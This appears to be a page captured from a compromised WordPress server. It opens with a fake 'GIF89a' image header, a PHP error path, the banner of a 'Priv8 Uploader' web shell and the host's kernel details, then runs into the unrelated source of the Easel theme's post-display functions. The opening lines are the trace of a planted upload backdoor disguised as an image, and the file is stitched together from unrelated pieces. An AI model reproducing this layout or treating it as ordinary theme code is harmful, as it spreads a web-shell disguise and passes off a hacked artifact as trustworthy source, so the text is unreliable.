GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
if (!function_exists('easel_display_post_title')) {
function easel_display_post_title() {
global $post, $wp_query;
if ((easel_themeinfo('disable_page_titles') && is_page()) || (easel_themeinfo('disable_post_titles') && !is_page()) || (is_page('chat') || is_page('forum'))) return;
if (is_page()) {
$post_title = "<h2 class=\"page-title\">";
} else {
$post_title = "<h2 class=\"post-title\">";
}
if (is_home() || is_search() || is_archive() && !is_page()) $post_title .= "<a href=\"".get_permalink()."\">";
$post_title .= get_the_title();
if (is_home() || is_search() || is_archive() && !is_page()) $post_title .= "</a>";
$post_title .= "</h2>\r\n";
echo apply_filters('easel_display_post_title',$post_title);
}
}
if (!function_exists('easel_display_post_thumbnail')) {
function easel_display_post_thumbnail() {
global $post;
if (function_exists('has_post_thumbnail')) {
if ( has_post_thumbnail() ) {
$link = get_post_meta( $post->ID, 'link', true );
if (empty($link)) $link = get_permalink();
$post_thumbnail = "<div class=\"post-image\"><center><a href=\"".$link."\" rel=\"bookmark\" title=\"Link to ".get_the_title()."\">".get_the_post_thumbnail($post->ID, 'large')."</a></center></div>\r\n";
echo apply_filters('easel_display_post_thumbnail', $post_thumbnail);
}
}
}
}
if (!function_exists('easel_display_author_gravatar')) {
function easel_display_author_gravatar() {
global $post, $wp_query, $is_IE;
if (is_page()) return;
if (easel_themeinfo('enable_post_author_gravatar')) {
$author_get_gravatar = get_avatar(get_the_author_meta('email'), 64, easel_random_default_avatar(get_the_author_meta('email'),get_the_author_meta('display_name')));
if (!$is_IE) $author_get_gravatar = str_replace('photo', 'photo instant nocorner itxtalt', $author_get_gravatar);
$author_gravatar = "<div class=\"post-author-gravatar\">".$author_get_gravatar."</div>\r\n";
echo apply_filters('easel_display_author_gravatar', $author_gravatar);
}
}
}
if (!function_exists('easel_display_post_calendar')) {
function easel_display_post_calendar() {
global $post, $wp_query;
if (is_page()) return;
if (easel_themeinfo('enable_post_calendar') && (($post->post_type == 'post') || ($post->post_type == 'comic'))) {
$post_calendar = "<div class=\"post-calendar-date\"><div class=\"calendar-date\"><span>".get_the_time('M')."</span>".get_the_time('d')."</div></div>\r\n";
echo apply_filters('easel_display_post_calendar', $post_calendar);
}
}
}
if (!function_exists('easel_display_post_author')) {
function easel_display_post_author() {
global $post, $authordata;
if ($post->post_type == 'post' && !easel_themeinfo('disable_author_info_in_posts')) {
$post_author = "<span class=\"post-author\">".__('by','easel')." <a href=\"".get_author_posts_url( $authordata->ID, $authordata->user_nicename )."\">".get_the_author()."</a></span>\r\n";
echo apply_filters('easel_display_post_author',$post_author);
}
}
}
if (!function_exists('easel_display_post_date')) {
function easel_display_post_date() {
global $post;
if ($post->post_type == 'post' && !easel_themeinfo('disable_date_info_in_posts')) {
$post_date = "<span class=\"posted-on\">".__('on ','easel')."</span><span class=\"post-date\">".get_the_time('F jS, Y')."</span>\r\n";
echo apply_filters('easel_display_post_date',$post_date);
}
}
}
if (!function_exists('easel_display_post_time')) {
function easel_display_post_time() {
global $post;
if ($post->post_type == 'post' && !easel_themeinfo('disable_date_info_in_posts')) {
$post_time = "<span class=\"posted-at\">".__('at ','easel')."</span><span class=\"post-time\">".get_the_time()."</span>\r\n";
echo apply_filters('easel_display_post_time',$post_time);
}
}
}
if (!function_exists('easel_display_post_category')) {
function easel_display_post_category() {
global $post;
$post_category = '';
if (!easel_themeinfo('disable_categories_in_posts') && !is_attachment() && ($post->post_type !== 'page')) {
if ($post->post_type == 'post') {
$post_cats = get_the_category_list(', ', 'multiple');
} else {
$post_cats = $post->post_type;
}
$post_category = "<div class=\"post-cat\">". __('Posted In: ','easel') .$post_cats."</div>\r\n";
}
echo apply_filters('easel_display_post_category', $post_category);
}
}
if (!function_exists('easel_display_post_tags')) {
function easel_display_post_tags() {
global $post;
if (!easel_themeinfo('disable_tags_in_posts')) {
$post_tags = "<div class=\"post-tags\">".get_the_tag_list(__('└ Tags: ','easel'), ', ', '<br />')."</div>\r\n";
echo apply_filters('easel_display_post_tags', $post_tags);
}
}
}
if (!function_exists('easel_display_comment_link')) {
function easel_display_comment_link() {
global $post;
if ($post->comment_status == 'open' && !is_singular()) { ?>
<div class="comment-link">
<?php comments_popup_link('<span class="comment-balloon comment-balloon-empty"> </span>'.__('Comment ','easel'), '<span class="comment-balloon">1</span> '.__('Comment ','easel'), '<span class="comment-balloon">%</span> '.__('Comments ','easel')); ?>
</div>
<?php
}
}
}
if (!function_exists('easel_display_blog_navigation')) {
function easel_display_blog_navigation() {
global $post, $wp_query;
if (easel_themeinfo('enable_comments_on_homepage') && (easel_themeinfo('home_post_count') == '1')) {
$temp_single = $wp_query -> is_single;
$wp_query -> is_single = true;
}
if (is_single() && !is_page() && !is_archive() && !is_search() && ($post->post_type !== 'comic') && ($post->post_type !== 'casts')) { ?>
<div class="blognav">
<?php previous_post_link('<span class="blognav-prev">%link</span>',__('‹ Prev','easel'), false); ?>
<?php next_post_link('<span class="blognav-next">%link</span>',__('Next ›','easel'), false); ?>
<div class="clear"></div>
</div>
<?php }
if (easel_themeinfo('enable_comments_on_homepage') && (easel_themeinfo('home_post_count') == '1')) {
$wp_query -> is_single = $temp_single;
}
}
}
if (!function_exists('easel_display_the_content')) {
function easel_display_the_content() {
global $post, $wp_query;
if (is_single() || is_home() || is_page()) {
if (!is_single()) { global $more; $more = 0; }
do_action('easel-display-the-content-before');
the_content(__('↓ Read the rest of this entry...','easel'));
do_action('easel-display-the-content-after');
} else {
do_action('easel-display-the-content-archive-before');
the_excerpt();
do_action('easel-display-the-content-archive-after');
}
}
}
if (!function_exists('easel_display_post')) {
function easel_display_post() {
global $post, $wp_query;
easel_display_blog_navigation(); ?>
<div <?php post_class(); ?>>
<?php easel_display_post_thumbnail(); ?>
<div class="post-head"><?php do_action('easel-post-head'); ?></div>
<div class="post-content">
<div class="post-info">
<?php
easel_display_author_gravatar();
easel_display_post_calendar();
if (function_exists('easel_show_mood_in_post')) easel_show_mood_in_post();
?>
<div class="post-text">
<?php
easel_display_post_title();
if (!is_page()) {
easel_display_post_author();
easel_display_post_date(); easel_display_post_time();
if (!is_archive() && !is_search() && $post->post_type == 'post') {edit_post_link(__('Edit','easel'), ' <span class="post-edit">', '</span>'); }
easel_display_post_category();
do_action('easel-post-info');
} ?>
</div>
</div>
<div class="clear"></div>
<div class="entry">
<?php easel_display_the_content(); ?>
<div class="clear"></div>
</div>
<?php wp_link_pages(array('before' => '<div class="linkpages"><span class="linkpages-pagetext">Pages:</span> ', 'after' => '</div>', 'next_or_number' => 'number')); ?>
<div class="clear"></div>
<?php if (!is_page()) { ?>
<div class="post-extras">
<?php
easel_display_post_tags();
do_action('easel-post-extras');
easel_display_comment_link();
?>
<div class="clear"></div>
</div>
<?php } else
edit_post_link(__('Edit this page.','easel'), '', ''); ?>
</div>
<div class="post-foot"><?php do_action('easel-post-foot'); ?></div>
</div>
<?php
if (is_page()) {
if ($post->comment_status == 'open') {
comments_template('', true);
}
} else {
comments_template('', true);
}
}
}
?>